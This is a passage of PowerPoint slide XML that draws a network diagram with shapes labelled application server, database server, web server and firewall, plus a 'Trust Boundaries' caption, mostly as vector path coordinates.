          <p:spPr>
            <a:xfrm>
              <a:off x="7872983" y="1888235"/>
              <a:ext cx="2299970" cy="3124200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2299970" h="3124200">
                  <a:moveTo>
                    <a:pt x="0" y="383286"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2985" y="335202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11704" y="288902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25796" y="244745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44902" y="203089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68664" y="164295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96723" y="128720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128720" y="96723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164295" y="68664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203089" y="44902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244745" y="25796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288902" y="11704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335202" y="2985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383286" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1916430" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1964513" y="2985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2010813" y="11704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054970" y="25796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2096626" y="44902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2135420" y="68664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2170995" y="96723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2202992" y="128720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2231051" y="164295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2254813" y="203089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2273919" y="244745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2288011" y="288902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2296730" y="335202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299716" y="383286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299716" y="2740914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2296730" y="2788997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2288011" y="2835297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2273919" y="2879454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2254813" y="2921110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2231051" y="2959904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2202992" y="2995479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2170995" y="3027476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2135420" y="3055535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2096626" y="3079297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054970" y="3098403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2010813" y="3112495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1964513" y="3121214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1916430" y="3124200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383286" y="3124200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335202" y="3121214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288902" y="3112495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244745" y="3098403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203089" y="3079297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164295" y="3055535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128720" y="3027476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96723" y="2995479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68664" y="2959904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44902" y="2921110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25796" y="2879454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11704" y="2835297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2985" y="2788997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2740914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="383286"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="12192">
              <a:solidFill>
                <a:srgbClr val="006FC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608313" y="2216657"/>
              <a:ext cx="1003300" cy="704215"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1003300" h="704214">
                  <a:moveTo>
                    <a:pt x="0" y="117348"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9227" y="71687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34385" y="34385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71687" y="9227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117348" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885444" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="931104" y="9227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968406" y="34385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="993564" y="71687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002791" y="117348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002791" y="586740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="993564" y="632400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968406" y="669702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="931104" y="694860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885444" y="704088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117348" y="704088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71687" y="694860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34385" y="669702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9227" y="632400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="586740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="117348"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="2895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721866" y="2340638"/>
            <a:ext cx="771324" cy="396801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61876" marR="5078" indent="-149815" defTabSz="914126">
              <a:lnSpc>
                <a:spcPct val="107500"/>
              </a:lnSpc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ppl</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10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cati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n  Server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40810" y="5356484"/>
            <a:ext cx="1564867" cy="258337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12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C55A11"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-35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C55A11"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Boundaries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969205" y="3049496"/>
            <a:ext cx="1654379" cy="2470776"/>
            <a:chOff x="7971281" y="3049397"/>
            <a:chExt cx="1654810" cy="2471420"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8608313" y="3064002"/>
              <a:ext cx="1003300" cy="704215"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1003300" h="704214">
                  <a:moveTo>
                    <a:pt x="0" y="117348"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9227" y="71687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34385" y="34385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71687" y="9227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117348" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885444" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="931104" y="9227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968406" y="34385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="993564" y="71687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002791" y="117348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002791" y="586740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="993564" y="632400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968406" y="669702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="931104" y="694860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885444" y="704088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117348" y="704088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71687" y="694860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34385" y="669702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9227" y="632400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="586740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="117348"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="2895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7971281" y="5212842"/>
              <a:ext cx="499745" cy="307975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="499745" h="307975">
                  <a:moveTo>
                    <a:pt x="81857" y="32325"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="66983" y="57087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484758" y="307975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="499744" y="283083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81857" y="32325"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="499745" h="307975">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="52069" y="81915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66983" y="57087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54609" y="49657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69468" y="24892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86322" y="24892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96773" y="7493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="499745" h="307975">
                  <a:moveTo>
                    <a:pt x="69468" y="24892"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="54609" y="49657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66983" y="57087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81857" y="32325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69468" y="24892"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="499745" h="307975">
                  <a:moveTo>
                    <a:pt x="86322" y="24892"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="69468" y="24892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81857" y="32325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86322" y="24892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767573" y="3187237"/>
            <a:ext cx="679908" cy="419625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="26663" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="210"/>
              </a:spcBef>
            </a:pP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Database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635" algn="ctr" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="110"/>
              </a:spcBef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Server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606072" y="3911221"/>
            <a:ext cx="1003039" cy="704032"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1003300" h="704214">
                <a:moveTo>
                  <a:pt x="0" y="117347"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9227" y="71687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34385" y="34385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71687" y="9227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117348" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="885444" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="931104" y="9227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="968406" y="34385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="993564" y="71687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1002791" y="117347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1002791" y="586739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="993564" y="632400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="968406" y="669702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="931104" y="694860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="885444" y="704087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117348" y="704087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71687" y="694860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34385" y="669702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9227" y="632400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="586739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="117347"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="2895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pPr defTabSz="914126"/>
            <a:endParaRPr sz="179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71179" y="4035140"/>
            <a:ext cx="473586" cy="396801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marR="5078" indent="66655" defTabSz="914126">
              <a:lnSpc>
                <a:spcPct val="107500"/>
              </a:lnSpc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Web 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200" spc="-20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>v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424906" y="1954025"/>
            <a:ext cx="3702989" cy="2870722"/>
            <a:chOff x="6426580" y="1953641"/>
            <a:chExt cx="3703954" cy="2871470"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="object 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7922513" y="1968246"/>
              <a:ext cx="2193290" cy="2842260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2193290" h="2842260">
                  <a:moveTo>
                    <a:pt x="0" y="365505"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2848" y="319669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11166" y="275528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24610" y="233426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42836" y="193706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65502" y="156710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92266" y="122783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122783" y="92266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156710" y="65502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193706" y="42836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233426" y="24610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275528" y="11166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319669" y="2848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365506" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827530" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1873366" y="2848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1917507" y="11166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1959609" y="24610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1999329" y="42836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2036325" y="65502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2070252" y="92266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2100769" y="122783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2127533" y="156710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2150199" y="193706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2168425" y="233426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2181869" y="275528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2190187" y="319669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2193036" y="365505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2193036" y="2476754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2190187" y="2522590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2181869" y="2566731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2168425" y="2608833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2150199" y="2648553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2127533" y="2685549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2100769" y="2719476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2070252" y="2749993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2036325" y="2776757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1999329" y="2799423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1959609" y="2817649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1917507" y="2831093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1873366" y="2839411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827530" y="2842260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365506" y="2842260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319669" y="2839411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275528" y="2831093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233426" y="2817649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193706" y="2799423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156710" y="2776757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122783" y="2749993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92266" y="2719476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65502" y="2685549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42836" y="2648553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24610" y="2608833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11166" y="2566731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2848" y="2522590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2476754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="365505"/>
                  </a:lnTo>
                  <a:close/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441185" y="2905505"/>
              <a:ext cx="429895" cy="1003300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="429895" h="1003300">
                  <a:moveTo>
                    <a:pt x="71627" y="1002791"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="43773" y="997154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21002" y="981789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5637" y="959018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="931163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="71627"/>
                  </a:ln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7" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358139" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385994" y="5637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408765" y="21002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424130" y="43773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429767" y="71627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429767" y="931163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424130" y="959018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408765" y="981789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385994" y="997154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358139" y="1002791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71627" y="1002791"/>
                  </a:lnTo>
                  <a:close/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552340" y="3132709"/>
            <a:ext cx="179536" cy="54849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696" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="1425"/>
              </a:lnSpc>
            </a:pP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re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all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239028" y="2005828"/>
            <a:ext cx="2399040" cy="2983723"/>
            <a:chOff x="6240653" y="2005457"/>
            <a:chExt cx="2399665" cy="2984500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="object 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7701534" y="3283458"/>
              <a:ext cx="620395" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="620395">
                  <a:moveTo>
                    <a:pt x="620395" y="0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8346186" y="2020062"/>
              <a:ext cx="0" cy="2790825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path h="2790825">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="2790571"/>
                  </a:lnTo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321802" y="2542794"/>
              <a:ext cx="262890" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="262890">
                  <a:moveTo>
                    <a:pt x="262763" y="0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8362950" y="3368802"/>
              <a:ext cx="262890" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="262890">
                  <a:moveTo>
                    <a:pt x="262763" y="0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8346186" y="4263389"/>
              <a:ext cx="262890" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="262890">
                  <a:moveTo>
                    <a:pt x="262763" y="0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7256526" y="2931414"/>
              <a:ext cx="428625" cy="1003300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="428625" h="1003300">
                  <a:moveTo>
                    <a:pt x="71374" y="1002792"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="43612" y="997176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20923" y="981868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5615" y="959179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="931418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="71374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5615" y="43612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20923" y="20923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43612" y="5615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71374" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356870" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384631" y="5615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407320" y="20923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422628" y="43612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428244" y="71374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428244" y="931418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422628" y="959179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407320" y="981868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384631" y="997176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356870" y="1002792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71374" y="1002792"/>
                  </a:lnTo>
                  <a:close/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6255258" y="2184654"/>
              <a:ext cx="0" cy="2790825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path h="2790825">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="2790571"/>
                  </a:lnTo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255258" y="3283458"/>
              <a:ext cx="186055" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="186054">
                  <a:moveTo>
                    <a:pt x="185927" y="0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83232" y="1904889"/>
            <a:ext cx="4860294" cy="636104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13332" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="298995" marR="5078" indent="-286934" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="298995" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="55" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
